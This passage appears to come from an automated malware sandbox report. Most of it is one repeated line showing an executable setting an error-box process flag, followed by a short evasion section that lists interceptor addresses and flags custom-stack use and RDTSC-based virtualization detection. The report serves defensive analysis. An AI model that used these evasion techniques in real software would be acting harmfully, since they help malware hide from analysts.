Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeAPI/Special instruction interceptor: Address: 2AFCCF1
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeAPI/Special instruction interceptor: Address: 28F988F
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeAPI/Special instruction interceptor: Address: 2A4A5F3
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeAPI/Special instruction interceptor: Address: 2913477
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeAPI/Special instruction interceptor: Address: 28F644B
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeAPI/Special instruction interceptor: Address: 22C49B3
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeAPI/Special instruction interceptor: Address: 2931C48
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeAPI/Special instruction interceptor: Address: 2B18234
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeAPI/Special instruction interceptor: Address: 28F988F
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeAPI/Special instruction interceptor: Address: 2AAF42F
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeAPI/Special instruction interceptor: Address: 298651D
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeAPI/Special instruction interceptor: Address: 2A52B72
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeAPI/Special instruction interceptor: Address: 294CDBA
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeAPI/Special instruction interceptor: Address: 2931C48
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeAPI/Special instruction interceptor: Address: 2AB86CF
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeAPI/Special instruction interceptor: Address: 6C8AD8A2
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeAPI/Special instruction interceptor: Address: 6C8C8EA5
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeAPI/Special instruction interceptor: Address: 6C8FABCF
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeAPI/Special instruction interceptor: Address: 6CB8B4FF
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeAPI/Special instruction interceptor: Address: 6CB1335C
Tries to detect virtualization through RDTSC time measurements
